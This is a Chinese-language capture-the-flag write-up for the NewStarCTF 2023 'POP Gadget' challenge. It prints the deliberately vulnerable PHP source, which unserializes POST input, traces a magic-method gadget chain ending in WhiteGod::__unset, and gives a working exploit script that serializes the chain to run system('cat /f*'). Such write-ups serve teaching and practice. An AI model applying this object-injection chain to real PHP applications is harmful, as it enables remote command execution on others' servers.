[NewStarCTF 2023 公开赛道]POP Gadget

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<?php
highlight_file(__FILE__);

class Begin{
    public $name;

    public function __destruct()
    {
        if(preg_match("/[a-zA-Z0-9]/",$this->name)){
            echo "Hello";
        }else{
            echo "Welcome to NewStarCTF 2023!";
        }
    }
}

class Then{
    private $func;

    public function __toString()
    {
        ($this->func)();
        return "Good Job!";
    }

}

class Handle{
    protected $obj;

    public function __call($func, $vars)
    {
        $this->obj->end();
    }

}

class Super{
    protected $obj;
    public function __invoke()
    {
        $this->obj->getStr();
    }

    public function end()
    {
        die("==GAME OVER==");
    }
}

class CTF{
    public $handle;

    public function end()
    {
        unset($this->handle->log);
    }

}

class WhiteGod{
    public $func;
    public $var;

    public function __unset($var)
    {
        ($this->func)($this->var);    
    }
}

@unserialize($_POST['pop']);

php反序列化的题

image-20250302144017861

我们发现5存在命令执行漏洞,所以我们需要触发5的__unset魔术方法,逐渐往上推,我们就能发现从1->2->3->4->5的反序列化链了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
<?php
highlight_file(__FILE__);

class Begin{
    public $name;
    
}

class Then{
    public $func;

}

class Handle{
    public $obj;

}

class Super{
    public $obj;

}

class CTF{
    public $handle;
    
}

class WhiteGod{
    public $func="system";
    public $var="cat /f*";
}

$pop=new Begin();
$pop->name=new Then();
$pop->name->func=new Super();
$pop->name->func->obj=new Handle();
$pop->name->func->obj->obj=new CTF();
$pop->name->func->obj->obj->handle=new WhiteGod();
echo serialize($pop);

运行,提交,得到flag

image-20250302145055319